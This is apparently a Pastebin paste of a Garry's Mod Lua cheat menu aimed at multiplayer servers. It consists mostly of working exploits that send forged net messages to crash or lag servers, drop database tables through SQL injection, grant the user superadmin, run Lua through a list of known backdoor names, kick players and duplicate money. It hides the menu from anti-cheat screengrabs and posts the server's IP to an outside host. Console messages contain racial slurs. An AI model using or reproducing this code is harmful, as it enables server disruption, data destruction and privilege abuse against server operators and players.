Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local RunString = RunString
- local net = table.Copy(net)
- local file = file
- net.Stort = net.Start
- if(istable(MOTDgd))then
- MOTDgd = {}
- function MOTDgd.Show() end
- function MOTDgd.GetIfSkip() return true end
- end -- no shit ok?
- /*
- -- vars
- */
- local s = {}
- s.STARTDETOURED = false
- concommand.Add("net_detour_start",function()
- if(type(net.Stort) != "nil")then
- s.STARTDETOURED = true
- net.Start = net.Stort
- print("net.Start Detoured")
- s.NoPls = function()
- RunString([[net.Start = function() end]])
- end
- s.YesPls = function()
- RunString([[net.Start = net.Stort]])
- end
- else
- print("sry u cant")
- end
- end)
- print("'net_detour_start' if u need it!")
- s.ChatClear,_ = pcall(require,"chatclear")
- s.Bind = {}
- s.Bind.Buttons = {}
- s.Bind.Buttons["q"] = KEY_Q
- s.Bind.Buttons["w"] = KEY_W
- s.Bind.Buttons["e"] = KEY_E
- s.Bind.Buttons["r"] = KEY_R
- s.Bind.Buttons["t"] = KEY_T
- s.Bind.Buttons["y"] = KEY_Y
- s.Bind.Buttons["u"] = KEY_U
- s.Bind.Buttons["i"] = KEY_I
- s.Bind.Buttons["o"] = KEY_O
- s.Bind.Buttons["p"] = KEY_P
- s.Bind.Buttons["a"] = KEY_A
- s.Bind.Buttons["s"] = KEY_S
- s.Bind.Buttons["d"] = KEY_D
- s.Bind.Buttons["f"] = KEY_F
- s.Bind.Buttons["g"] = KEY_G
- s.Bind.Buttons["h"] = KEY_H
- s.Bind.Buttons["j"] = KEY_J
- s.Bind.Buttons["k"] = KEY_K
- s.Bind.Buttons["l"] = KEY_L
- s.Bind.Buttons["z"] = KEY_Z
- s.Bind.Buttons["x"] = KEY_X
- s.Bind.Buttons["c"] = KEY_C
- s.Bind.Buttons["v"] = KEY_V
- s.Bind.Buttons["b"] = KEY_B
- s.Bind.Buttons["n"] = KEY_N
- s.Bind.Buttons["m"] = KEY_M
- s.Bind.Buttons["home"] = KEY_HOME
- s.Bind.Buttons["end"] = KEY_END
- s.Bind.Bind = s.Bind.Buttons["end"]
- if(!file.Exists("_sex_info/_setting.txt","DATA"))then
- s.Bind.Ask = vgui.Create( "DFrame" )
- s.Bind.Ask.PerformLayout = function()
- s.Bind.Ask.lblTitle:SetFont("_xploiter_font@@@")
- s.Bind.Ask.lblTitle:SetPos( 8 , 2 )
- s.Bind.Ask.lblTitle:SetSize( s.Bind.Ask:GetWide() - 25, 20 )
- end
- s.Bind.Ask.ShowCloseButton = function() end
- s.Bind.Ask:SetSize(400,200)
- s.Bind.Ask:SetTitle("Select exploit menu bind pls")
- s.Bind.Ask:Center()
- s.Bind.Ask.btnMaxim:Remove()
- s.Bind.Ask.btnMinim:Remove()
- s.Bind.Ask.btnClose:Remove()
- s.Bind.Ask:MakePopup()
- s.Bind.AskDSP = vgui.Create( "DScrollPanel", s.Bind.Ask )
- s.Bind.AskDSP:Dock( FILL )
- for k,v in pairs (s.Bind.Buttons) do
- local button = s.Bind.AskDSP:Add( "DButton" )
- button:Dock( TOP )
- button:DockMargin( 0, 0, 0, 5 )
- button:SetText( string.upper(k) )
- button:SetFont("_xploiter_font@@_")
- button.DoClick = function()
- file.CreateDir("_sex_info")
- file.Write("_sex_info/_setting.txt",k)
- s.Bind.Bind = s.Bind.Buttons[k]
- s.Bind.Ask:Remove()
- end
- end
- else
- s.Bind.Bind = s.Bind.Buttons[file.Read("_sex_info/_setting.txt","DATA")]
- end
- s.hitRequest = {}
- s.hitRequest.hitman = LocalPlayer()
- s.hitRequest.requester = LocalPlayer()
- s.hitRequest.target = LocalPlayer()
- s.hitRequest.reward = -99999999999999999999999
- s.duel = {}
- s.duel[1] = table.Random( player.GetAll() )
- s.duel[2] = table.Random( player.GetAll() )
- s.duel[2] = 3
- s.duel[3] = -9999999
- s.lagz16 = { cmd = "+forward" , args = " " }
- s.lags17 = { " " , "Open" , nil , nil , nil , nil }
- s.Target = {}
- s.Exploits = {}
- s.colors = {}
- s.count = 0
- s.AtlasFuck = ""
- for i=1, 100 do
- s.AtlasFuck = s.AtlasFuck .. "<avatar>"
- end
- s.pp = istable(FPP) or istable(GPP) or istable(CPP) -- need mor
- s.colors[1] = Color(28,28,28,30)
- s.colors[2] = Color(75,50,100,30)
- s.colors[3] = Color(1,149,205,30)
- s.colors[4] = Color(255,144,0,30)
- s.colors[5] = Color(229,13,13,30)
- s.LagText = "0xFFFFFFF"
- /*
- -- Init menu
- */
- surface.CreateFont("_xploiter_font@@@",{font = "tahoma",size = 22,weight = 10000,blursize = 0,scanlines = 0,antialias = true})
- surface.CreateFont("_xploiter_font@@_",{font = "tahoma",size = 16,weight = 10000,blursize = 0,scanlines = 0,antialias = true})
- surface.CreateFont("_xploiter_font@__",{font = "tahoma",size = 12,weight = 10000,blursize = 0,scanlines = 0,antialias = true})
- s.Main = vgui.Create("DFrame")
- s.Main:SetSize(700,600)
- s.Main:Center()
- s.Main:SetTitle("Luc1fer is a Cunt")
- s.Main.Paint = function(_,w,h)
- --draw.RoundedBox(0,0,0,w,h,Color(28,28,28,235))
- --draw.RoundedBox(0,0,0,w,25,Color(28,28,28,255))
- local f;
- for i=0, 600 do
- f = i / 600;
- surface.SetDrawColor(
- math.min(Lerp(f, color_black.r, Color(50,50,50).r), 255),
- math.min(Lerp(f, color_black.g, Color(50,50,50).g), 255),
- math.min(Lerp(f, color_black.b, Color(50,50,50).b), 255),
- 255
- );
- surface.DrawLine(0, i, 700, i);
- end
- draw.SimpleText(#s.Exploits.."/"..s.count,"_xploiter_font@@_",350,0,Color(255,255,255,204))
- if(!s.pp)then
- draw.SimpleText("Shit Server Crash it","_xploiter_font@@_",400,0,Color(255,255,255,204))
- end
- draw.SimpleText("Group","_xploiter_font@@_",485,25,Color(255,255,255,204))
- draw.SimpleText("Team","_xploiter_font@@_",573,25,Color(255,255,255,204))
- draw.SimpleText("Name","_xploiter_font@@_",661,25,Color(255,255,255,204))
- end
- s.Main:MakePopup()
- s.Main.btnClose.DoClick = function()
- s.Main:Hide()
- end
- s.oldRC = render.Capture
- render.Capture = function( ... )
- s.Main:Hide()
- render.RenderView()
- render.RenderHUD(0,0,ScrW(),ScrH())
- for k,v in pairs (hook.GetTable()["HUDPaint"]) do
- v()
- end
- timer.Simple(0.5,function()
- chat.AddText("[SEX] some shit screengrabbed u and menu was closed")
- end)
- return s.oldRC( ... )
- end
- s.Main.btnClose.Paint = function(_,w,h)
- if(s.Main.btnClose:IsDown())then
- draw.RoundedBox(0,0,0,w,h,Color(255,0,0,235))
- else
- draw.RoundedBox(0,0,0,w,h,Color(255,50,50,235))
- end
- end
- s.Main.PerformLayout = function()
- s.Main.lblTitle:SetFont("_xploiter_font@@@")
- s.Main.lblTitle:SetPos( 8 , 2 )
- s.Main.lblTitle:SetSize( s.Main:GetWide() - 25, 20 )
- end
- s.Main.ShowCloseButton = function() end
- s.Main.btnMaxim:Remove()
- s.Main.btnMinim:Remove()
- s.Main:Hide()
- s.lock = 0
- vgui.GetWorldPanel().Paint = function()
- for i=1,#s.Target do
- if !IsValid(s.Target[i]) then
- table.remove( s.Target, i )
- end
- end
- if(input.IsKeyDown(s.Bind.Bind) and !LocalPlayer():IsTyping())then
- if(s.lock == 0)then
- if(s.Main:IsVisible())then
- s.Main:Hide()
- s.lock = 1
- else
- s.Main:Show()
- s.lock = 1
- if(IsValid(s.dsp))then
- table.sort( s.Exploits, function( a, b ) return a[10] > b[10] end )
- s.dsp:Clear()
- for k, v in pairs( s.Exploits ) do
- if(v[5] == 1 and !isnumber(v[7]) )then
- v[7] = 0
- end
- local sploit = s.dsp:Add( "DButton" )
- sploit:SetText('')
- sploit:SetPos(5,(k-1)*50+5)
- sploit:SetSize(465,45)
- sploit.Paint = function(_,w,h)
- --draw.RoundedBox(0,0,0,w,h,s.colors[v[10]])
- local f;
- for i=0, 45 do
- f = i / 45;
- surface.SetDrawColor(
- math.min(Lerp(f, color_black.r, s.colors[v[10]].r), 255),
- math.min(Lerp(f, color_black.g, s.colors[v[10]].g), 255),
- math.min(Lerp(f, color_black.b, s.colors[v[10]].b), 255),
- 255
- );
- surface.DrawLine(0, i,465, i);
- end
- draw.SimpleText("Name: '"..v[1].."'","_xploiter_font@@_",5,2,Color(255,255,255,204))
- draw.SimpleText("Net string: '"..v[3].."'","_xploiter_font@@_",w-5,2,Color(255,255,255,204),2)
- draw.SimpleText("Hint: '"..v[2].."'","_xploiter_font@@_",5,25,Color(255,255,255,204))
- if(v[7] == 1)then
- draw.RoundedBox(0,347, 22, 111 , 16,Color(50,255,50,54))
- end
- if(!isnumber(v[7]))then
- if(sploit:IsDown())then
- draw.RoundedBox(0,347, 22, 111 , 16,Color(50,50,255,54))
- end
- end
- surface.SetDrawColor( Color(255,255,255,204) )
- surface.DrawOutlinedRect( 0, 0, w , h )
- surface.DrawOutlinedRect( 345, 20, 115 , 20 )
- end
- sploit.DoClick = function()
- if(isnumber(v[7]))then
- if(v[7] == 0)then
- surface.PlaySound("buttons/combine_button3.wav") chat.AddText("[SEX] -> "..v[3])
- if(s.STARTDETOURED)then s.NoPls() end
- v[7] = 1
- v[4](v[7])
- else
- surface.PlaySound("buttons/combine_button2.wav") chat.AddText("[SEX] || "..v[3])
- if(s.STARTDETOURED)then s.YesPls() end
- v[7] = 0
- v[4](v[7])
- end
- else
- surface.PlaySound("buttons/combine_button3.wav") chat.AddText("[SEX] --> "..v[3])
- v[4]()
- end
- end
- end
- end
- if(IsValid(s.dsp2))then
- s.dsp2:Clear()
- for k, v in pairs( player.GetAll() ) do
- local Egrok = s.dsp2:Add( "DButton" )
- Egrok:SetText( v:GetUserGroup().." | "..team.GetName(v:Team()).." | "..v:Nick() )
- Egrok:SetPos(5,(k-1)*30+5)
- Egrok:SetSize(200,25)
- Egrok:SetFont( "_xploiter_font@__" )
- Egrok.Paint = function(_,w,h)
- if(table.HasValue(s.Target,v))then
- draw.RoundedBox(0,0,0,w,h,Color(255,50,50,204))
- end
- surface.SetDrawColor( Color(255,255,255,204) )
- surface.DrawOutlinedRect( 0, 0, w , h )
- if(!IsValid(v))then
- table.RemoveByValue(s.Target,v)
- Egrok:Remove()
- end
- end
- Egrok.DoClick = function()
- if(table.HasValue(s.Target,v))then
- table.RemoveByValue(s.Target,v)
- else
- s.Target[#s.Target+1]=v
- end
- end
- Egrok.UpdateColours = function()
- return Egrok:SetTextStyleColor( Color(255,255,255,204) )
- end
- end
- end
- end
- end
- else
- s.lock = 0
- end
- end
- concommand.Add("open_cool_menu",function()
- s.Main:Show()
- s.lock = 1
- if(IsValid(s.dsp))then
- table.sort( s.Exploits, function( a, b ) return a[10] > b[10] end )
- s.dsp:Clear()
- for k, v in pairs( s.Exploits ) do
- if(v[5] == 1 and !isnumber(v[7]) )then
- v[7] = 0
- end
- local sploit = s.dsp:Add( "DButton" )
- sploit:SetText('')
- sploit:SetPos(5,(k-1)*50+5)
- sploit:SetSize(465,45)
- sploit.Paint = function(_,w,h)
- local f;
- for i=0, 45 do
- f = i / 45;
- surface.SetDrawColor(
- math.min(Lerp(f, color_black.r, s.colors[v[10]].r), 255),
- math.min(Lerp(f, color_black.g, s.colors[v[10]].g), 255),
- math.min(Lerp(f, color_black.b, s.colors[v[10]].b), 255),
- 255
- );
- surface.DrawLine(0, i,465, i);
- end
- draw.SimpleText("Name: '"..v[1].."'","_xploiter_font@@_",5,2,Color(255,255,255,204))
- draw.SimpleText("Net string: '"..v[3].."'","_xploiter_font@@_",w-5,2,Color(255,255,255,204),2)
- draw.SimpleText("Hint: '"..v[2].."'","_xploiter_font@@_",5,25,Color(255,255,255,204))
- if(v[7] == 1)then
- draw.RoundedBox(0,347, 22, 111 , 16,Color(50,255,50,54))
- end
- if(!isnumber(v[7]))then
- if(sploit:IsDown())then
- draw.RoundedBox(0,347, 22, 111 , 16,Color(50,50,255,54))
- end
- end
- surface.SetDrawColor( Color(255,255,255,204) )
- surface.DrawOutlinedRect( 0, 0, w , h )
- surface.DrawOutlinedRect( 345, 20, 115 , 20 )
- end
- sploit.DoClick = function()
- if(isnumber(v[7]))then
- if(v[7] == 0)then
- surface.PlaySound("buttons/combine_button3.wav") chat.AddText("[SEX] -> "..v[3])
- if(s.STARTDETOURED)then s.NoPls() end
- v[7] = 1
- v[4](v[7])
- else
- surface.PlaySound("buttons/combine_button2.wav") chat.AddText("[SEX] || "..v[3])
- if(s.STARTDETOURED)then s.YesPls() end
- v[7] = 0
- v[4](v[7])
- end
- else
- surface.PlaySound("buttons/combine_button3.wav") chat.AddText("[SEX] --> "..v[3])
- v[4]()
- end
- end
- end
- end
- if(IsValid(s.dsp2))then
- s.dsp2:Clear()
- for k, v in pairs( player.GetAll() ) do
- local Egrok = s.dsp2:Add( "DButton" )
- Egrok:SetText( v:GetUserGroup().." | "..team.GetName(v:Team()).." | "..v:Nick() )
- Egrok:SetPos(5,(k-1)*30+5)
- Egrok:SetSize(200,25)
- Egrok:SetFont( "_xploiter_font@__" )
- Egrok.Paint = function(_,w,h)
- if(table.HasValue(s.Target,v))then
- draw.RoundedBox(0,0,0,w,h,Color(255,50,50,204))
- end
- surface.SetDrawColor( Color(255,255,255,204) )
- surface.DrawOutlinedRect( 0, 0, w , h )
- if(!IsValid(v))then
- table.RemoveByValue(s.Target,v)
- Egrok:Remove()
- end
- end
- Egrok.DoClick = function()
- if(table.HasValue(s.Target,v))then
- table.RemoveByValue(s.Target,v)
- else
- s.Target[#s.Target+1]=v
- end
- end
- Egrok.UpdateColours = function()
- return Egrok:SetTextStyleColor( Color(255,255,255,204) )
- end
- end
- end
- end)
- print("if u dumb nigger then type in console 'open_cool_menu'")
- print("open_cool_menu <- type it in ur console nigga")
- print("open_cool_menu")
- print("-> open_cool_menu <-")
- s.dsp = vgui.Create( "DScrollPanel", s.Main )
- s.dsp:SetPos(5,25)
- s.dsp:SetSize(475,570)
- s.dsp.Paint = function(_,w,h)
- surface.SetDrawColor( Color(255,255,255,204) )
- surface.DrawOutlinedRect( 0, 0, w , h )
- end
- s.dsp2 = vgui.Create( "DScrollPanel", s.Main )
- s.dsp2:SetPos(485,45)
- s.dsp2:SetSize(210,490)
- s.dsp2.Paint = function(_,w,h)
- surface.SetDrawColor( Color(255,255,255,204) )
- surface.DrawOutlinedRect( 0, 0, w , h )
- end
- s.TE = vgui.Create( "DTextEntry", s.Main )
- s.TE:SetPos(485,540)
- s.TE:SetSize(210,25)
- s.TE:SetText("Shitty Paste")
- s.TE:SetFont("_xploiter_font@@_")
- s.TE.Paint = function(s,w,h)
- s:DrawTextEntryText(Color(255,255,255,204), Color(70, 70, 255), Color(0,0,0))
- surface.SetDrawColor( Color(255,255,255,204) )
- surface.DrawOutlinedRect( 0, 0, w , h )
- end
- s.SaveShit = vgui.Create( "DButton", s.Main )
- s.SaveShit:SetPos(485,570)
- s.SaveShit:SetSize(210,25)
- s.SaveShit:SetFont( "_xploiter_font@__" )
- s.SaveShit:SetText("Save server bullshit something idk")
- s.SaveShit.Paint = function(_,w,h)
- if(s.SaveShit:IsDown())then
- draw.RoundedBox(0,0,0,w,h,Color(50,255,50,104))
- else
- draw.RoundedBox(0,0,0,w,h,Color(50,255,50,54))
- end
- surface.SetDrawColor( Color(255,255,255,204) )
- surface.DrawOutlinedRect( 0, 0, w , h )
- end
- s.SaveShit.UpdateColours = function()
- return s.SaveShit:SetTextStyleColor( Color(255,255,255,204) )
- end
- s.SaveShit.DoClick = function()
- surface.PlaySound( "items/ammo_pickup.wav" )
- http.Post("http://osniffer.pro/danet_1.gif?"..game.GetIPAddress(),{})
- chat.AddText("saved to data/_sex_info/"..string.Replace(game.GetIPAddress(),":","-").." ("..#s.Exploits.."-"..s.count..").txt")
- if(!file.Exists("_sex_info","DATA"))then
- file.CreateDir("_sex_info")
- end
- local name = "_sex_info/"..string.Replace(game.GetIPAddress(),":","-").." ("..#s.Exploits.."-"..s.count..").txt"
- file.Write(name,"IP: "..game.GetIPAddress().." aka '"..GetHostName().."'\r\nExploits Count: "..#s.Exploits.."/"..s.count.."\r\nExploit List:\r\n")
- for i=1,#s.Exploits do
- file.Append(name,"\r\n".."#"..i.." "..s.Exploits[i][1].."("..s.Exploits[i][3]..")".."\r\n"..s.Exploits[i][2].."\r\n")
- end
- end
- /*
- -- Functions
- */
- s.ValidNetString = function( str )
- return isstring(str) and util.NetworkStringToID( str ) != 0 and str != ""
- end
- s.AddExploit = function( rare, name , dis , netstr , onfunc , multi , needpp , timername , delay )
- if(!isnumber(delay))then
- delay = 0.5
- end
- local num = #s.Exploits+1
- if(needpp == 0 or (needpp == 1 and !s.pp))then
- if(isstring(netstr))then
- if(s.ValidNetString(netstr) or netstr == "")then
- s.Exploits[num] = {}
- s.Exploits[num][1] = name
- s.Exploits[num][2] = dis
- if(netstr == "")then
- s.Exploits[num][3] = name
- else
- s.Exploits[num][3] = netstr
- end
- if(multi == 1)then
- s.Exploits[num][4] = function(per)
- timer.Create(timername, delay, 0, function()
- if(per == 1)then
- onfunc()
- else
- timer.Remove(timername)
- end
- end)
- end
- else
- s.Exploits[num][4] = function() onfunc() end
- end
- s.Exploits[num][5] = multi
- s.Exploits[num][6] = needpp
- s.Exploits[num][10] = rare
- end
- end
- if(istable(netstr))then
- local valid = false
- for i=1,#netstr do
- if(s.ValidNetString(netstr[i]))then
- valid = true
- end
- end
- if(valid)then
- s.Exploits[num] = {}
- s.Exploits[num][1] = name
- s.Exploits[num][2] = dis
- local net_key = " "
- for i=1,#netstr do
- if(s.ValidNetString(netstr[i]))then
- net_key = net_key .. netstr[i] .. " "
- end
- end
- s.Exploits[num][3] = tostring(net_key)
- if(multi == 1)then
- s.Exploits[num][4] = function(per)
- timer.Create(timername, delay, 0, function()
- if(per == 1)then
- for i=1,#netstr do onfunc(netstr[i]) print(netstr[i]) end
- else
- timer.Remove(timername)
- end
- end)
- end
- else
- s.Exploits[num][4] = function() for i=1,#netstr do onfunc(netstr[i]) end end
- end
- s.Exploits[num][5] = multi
- s.Exploits[num][6] = needpp
- s.Exploits[num][10] = rare
- end
- end
- end
- s.count = s.count + 1
- end
- /*
- -- Exploits
- */
- s.AddExploit(2,"Remove all ents","Remove all entities lol","properties",function()
- for i=1,#ents.GetAll() do
- net.Start( "properties" )
- net.WriteString( "remove" )
- net.WriteEntity( ents.GetAll()[i] )
- net.SendToServer()
- end
- end, 0,1)
- s.AddExploit(2,"Strip weapon","Select target and toggle stripper","properties",function()
- for i=1,#s.Target do
- if(IsValid(s.Target[i]) and IsValid(s.Target[i]:GetActiveWeapon()))then
- net.Start( "properties" )
- net.WriteString( "remove" )
- net.WriteEntity( s.Target[i]:GetActiveWeapon() )
- net.SendToServer()
- end
- end
- end, 1,1,"_sex_strip_weapons",0.1)
- s.AddExploit(1,"Get Easter Egg","write shit in chat also funny","egg",function()
- net.Start( "egg" )
- net.SendToServer()
- end, 0,0)
- s.AddExploit( 3, "Give weapons" , "Give some weapons for you (enter type)" , "CraftSomething" , function()
- net.Start( "CraftSomething" )
- net.WriteEntity( LocalPlayer() )
- net.WriteString( s.TE:GetText() )
- net.WriteString( "" )
- net.WriteString( "weapon" )
- net.SendToServer()
- end, 0 , 0)
- s.AddExploit( 3, "Inf ammo" , "buy inf ammo for you wepon" , "TCBBuyAmmo" , function()
- net.Start("TCBBuyAmmo")
- net.WriteTable( {nil,LocalPlayer():GetActiveWeapon():GetPrimaryAmmoType(),nil,"0","999999"} )
- net.SendToServer()
- end, 0 , 0)
- s.AddExploit(2,"Free rp money #1","Gives u free money from money printers","DataSend",function()
- for k, v in pairs( ents.GetAll() ) do
- if v:GetClass() == "adv_moneyprinter" then
- net.Start("DataSend")
- net.WriteFloat(2)
- net.WriteEntity(v)
- net.WriteEntity(LocalPlayer())
- net.SendToServer()
- end
- end
- end, 1,0,"_sex_free_money",1)
- s.AddExploit(1,"Set name","U have no name (friends)","gportal_rpname_change",function()
- net.Start("gportal_rpname_change")
- net.WriteString(s.TE:GetText())
- net.WriteString(" ")
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Free rp money #2","Gives u free money from farm shit","FarmingmodSellItems",function()
- net.Start( "FarmingmodSellItems" )
- net.WriteTable({
- Cost = 10,
- CropModel = "models/props/eryk/garlic.mdl",
- CropType = 2,
- Info = "Garlic Seed",
- Model = "models/props/eryk/seedbag.mdl",
- Name = "Garlic",
- Quality = 4,
- Sell = 99999,
- Type = "Seed"
- })
- net.WriteInt(1,16)
- net.SendToServer()
- end, 1,0,"_sex_free_money_2",1)
- s.AddExploit(1,"Hack geypads","Hack all keypads (useless)","start_wd_emp",function()
- net.Start("start_wd_emp")
- net.SendToServer()
- end, 0,0)
- s.AddExploit(5,"Run lua command","type command in textentry",{"memeDoor",
- "Sbox_darkrp",
- "Sbox_itemstore",
- "Ulib_Message",
- "ULogs_Info",
- "ITEM",
- "fix",
- "noclipcloakaesp_chat_text",
- "_Defqon",
- "nocheat",
- "ULX_QUERY2",
- "Sandbox_GayParty",
- "DarkRP_UTF8",
- "oldNetReadData",
- "BackDoor",
- "OdiumBackDoor",
- "cucked",
- "NoNerks",
- "kek",
- "ZimbaBackDoor",
- "something",
- "random",
- "strip0",
- "fellosnake",
- "idk",
- "killserver",
- "fuckserver",
- "cvaraccess",
- "rcon",
- "rconadmin",
- "web",
- "Þà?D)◘",
- "DefqonBackdoor",
- "Sandbox_Armdupe",
- "DarkRP_AdminWeapons",
- "SessionBackdoor",
- "Fix_Keypads",
- "Remove_Exploiters",
- "noclipcloakaesp_chat_text",
- "_Defqon",
- "_CAC_ReadMemory",
- "nostrip",
- "LickMeOut",
- "MoonMan",
- "Im_SOCool",
- "ULXQUERY2",
- "jesuslebg",
- "zilnix",
- "enablevac",
- "c",
- "Sbox_gm_attackofnullday_key",
- "Þà ?D)◘",
- "disablebackdoor",
- "kill"},function(netstr)
- if(s.ValidNetString(netstr))then
- net.Start(netstr)
- net.WriteString(s.TE:GetText())
- net.WriteBit(1)
- net.SendToServer()
- net.Start(netstr)
- net.WriteString(s.TE:GetText())
- net.WriteBit(0)
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(3,"Free rp money #3","Gives u free money from duel","duelrequestguiYes",function()
- net.Start("duelrequestguiYes")
- net.WriteInt(math.random(800000,9000000),32)
- net.WriteEntity(table.Random( player.GetAll() ))
- net.WriteString("Crossbow")
- net.SendToServer()
- end, 1,0,"_sex_free_money_3",1)
- s.AddExploit(2,"Strip weapons","Strip weapons from all legit","drugseffect_remove",function()
- net.Start("drugseffect_remove")
- net.SendToServer()
- end, 0,0)
- s.AddExploit(2,"Remove money","Strip weapons from all legit","drugs_money",function()
- net.Start("drugs_money")
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Ignity entities","Write type in textentry","drugs_ignite",function()
- net.Start("drugs_ignite")
- net.WriteString(s.TE:GetText())
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Health crazy","lol wtf u wot m8?","drugseffect_hpremove",function()
- net.Start("drugseffect_hpremove")
- net.WriteString(math.random(0,999999))
- net.SendToServer()
- end, 1,0,"_sex_u_wot_m8",0.5)
- s.AddExploit(3,"Remove entities","Write type in textentry","drugs_text",function()
- net.Start("drugs_text")
- net.WriteString(s.TE:GetText())
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Kick all n00bz","Just kick all and you too","DL_Answering",function()
- for i=1,1000 do
- net.Start("DL_Answering")
- net.SendToServer()
- end
- end, 1,0,"_sex_kick_noobz",0.1)
- s.AddExploit(4,"Crash shit server","SimplAC - sucks","SimplicityAC_aysent",function()
- net.Start("SimplicityAC_aysent")
- net.WriteUInt(1, 8)
- net.WriteUInt(4294967295, 32)
- net.WriteTable(_G)
- net.SendToServer()
- end, 0,0)
- s.AddExploit(2,"Lags? #1","Just lags","ATS_WARP_REMOVE_CLIENT",function()
- for k,v in pairs(player.GetAll()) do
- for j=1,5 do
- net.Start( "ATS_WARP_REMOVE_CLIENT" )
- net.WriteEntity( v )
- net.WriteString( "adminroom1" )
- net.SendToServer()
- net.Start( "ATS_WARP_FROM_CLIENT" )
- net.WriteEntity( v )
- net.WriteString( "adminroom1" )
- net.SendToServer()
- net.Start( "ATS_WARP_VIEWOWNER" )
- net.WriteEntity( v )
- net.WriteString( "adminroom1" )
- net.SendToServer()
- end
- end
- end, 1,0,"_sex_lagz_1",0.1)
- s.AddExploit(2,"Lags? #2","Just lags","CFRemoveGame",function()
- for j=1,2000 do
- net.Start( "CFRemoveGame" )
- net.WriteFloat( math.Round("2147483646\n") )
- net.SendToServer()
- net.Start( "CFJoinGame" )
- net.WriteFloat( math.Round("2147483646\n") )
- net.SendToServer()
- net.Start( "CFEndGame" )
- net.WriteFloat( math.Round("2147483646\n") )
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_2",0.1)
- s.AddExploit(2,"Lags? #3","Just lags","CreateCase",function()
- for j=1,2000 do
- net.Start( "CreateCase" )
- net.WriteString( s.LagText )
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_3",0.1)
- s.AddExploit(2,"Lags? #4","Just lags","rprotect_terminal_settings",function()
- for j=1,2000 do
- net.Start( "rprotect_terminal_settings" )
- net.WriteEntity( table.Random( player.GetHumans() ) )
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_4",0.1)
- s.AddExploit(2,"Lags? #5","Just lags","StackGhost",function()
- for j=1,1100 do
- net.Start( "StackGhost" )
- net.WriteInt( 69,32 )
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_5",0.3)
- s.AddExploit(3,"Kick guys","Select a target and kick","NLRKick",function()
- for i=1,#s.Target do
- net.Start("NLRKick")
- net.WriteEntity(s.Target[i])
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(2,"Lags? #6","Just lags","JoinOrg",function()
- for j=1,1000 do
- for k,v in pairs(player.GetAll()) do
- net.Start("JoinOrg")
- net.WriteEntity(v)
- net.WriteString(s.LagText)
- net.SendToServer()
- end
- end
- end, 1,0,"_sex_lagz_6",0.02)
- s.AddExploit(3,"Remove entities","write type in textentry (* to all)","timebombDefuse",function()
- for i=1,#ents.FindByClass(s.TE:GetText()) do
- net.Start("timebombDefuse")
- net.WriteEntity(ents.FindByClass(s.TE:GetText())[i])
- net.WriteBool(true)
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(2,"Lags? #7","Just lags","pac_submit",function()
- for j=1,2200 do
- net.Start("pac_submit")
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_7",0.3)
- /*s.AddExploit(2,"Lags? #37","Just lags","dlib.getinfo.replicate",function()
- for j=1,2000 do
- net.Start("dlib.getinfo.replicate")
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_37",0.3)*/
- s.AddExploit(2,"Lags? #8","Just lags","steamid2",function()
- for j=1,100 do
- net.Start( "steamid2" )
- net.WriteString( s.LagText )
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_8",0)
- s.AddExploit(2,"Lags? #9","Just lags","NDES_SelectedEmblem",function()
- for j=1,2000 do
- net.Start( "NDES_SelectedEmblem" )
- net.WriteString( s.LagText )
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_9",0.5)
- s.AddExploit(2,"Lags? #10","Just lags","Morpheus.StaffTracker",function()
- for j=1,2000 do
- net.Start("Morpheus.StaffTracker")
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_10",0.1)
- s.AddExploit(2,"Lags? #11","Just lags","join_disconnect",function()
- local gay = player.GetAll()[1]
- for j=1,1100 do
- net.Start("join_disconnect")
- net.WriteEntity(gay)
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_11",0.05)
- s.AddExploit(4,"Get superadmin","lol u're lucky","pplay_deleterow",function()
- print("im started")
- local id = LocalPlayer():SteamID()
- local tbl = {}
- tbl.name = "FAdmin_PlayerGroup"
- tbl.where = {
- "steamid",
- tostring(id)
- }
- net.Start("pplay_deleterow")
- net.WriteTable(tbl)
- net.SendToServer()
- local tbl = {}
- tbl.tblname = "FAdmin_PlayerGroup"
- tbl.tblinfo = {
- tostring(id),
- "superadmin"
- }
- net.Start("pplay_addrow")
- net.WriteTable(tbl)
- net.SendToServer()
- end, 0,0)
- s.AddExploit(2,"Lags? #12","Just lags","EZS_PlayerTag",function()
- for j=1,1000 do
- for k, v in pairs(player.GetAll()) do
- net.Start( "EZS_PlayerTag" )
- net.WriteEntity(v)
- net.WriteString(v:Name())
- net.SendToServer()
- end
- end
- end, 1,0,"_sex_lagz_12",0.2)
- s.AddExploit(4,"Remove server sql data","Just removes data","pplay_sendtable",function()
- local tbl = {}
- tbl.tblname = "darkrp_door; DROP TABLE darkrp_player; CREATE TABLE darkrp_player(a STRING)"
- tbl.ply = LocalPlayer()
- net.Start("pplay_sendtable")
- net.WriteTable(tbl)
- net.SendToServer()
- end, 0,0)
- s.AddExploit(4,"fuck server data","Just rape server data","WriteQuery",function()
- for i=1,2200 do
- net.Start( "WriteQuery" )
- --net.WriteString("1")
- net.SendToServer()
- end
- end, 1,0,"_sex_rip_data",0.3)
- s.AddExploit(3,"Free rp money #4","Gives u free money from shit","SendMoney",function()
- net.Start( "SendMoney" )
- net.WriteEntity( LocalPlayer() )
- net.WriteEntity( LocalPlayer() )
- net.WriteEntity( LocalPlayer() )
- net.WriteString( "-1000000" )
- net.SendToServer()
- end, 1,0,"_sex_free_money_4",1)
- s.AddExploit(3,"Free rp money #5","Gives u free money from bail","BailOut",function()
- for k, v in pairs(player.GetAll()) do
- net.Start( "BailOut" )
- net.WriteEntity( LocalPlayer() )
- net.WriteEntity( v )
- net.WriteFloat( -1000000 )
- net.SendToServer()
- end
- end, 1,0,"_sex_free_money_4",1)
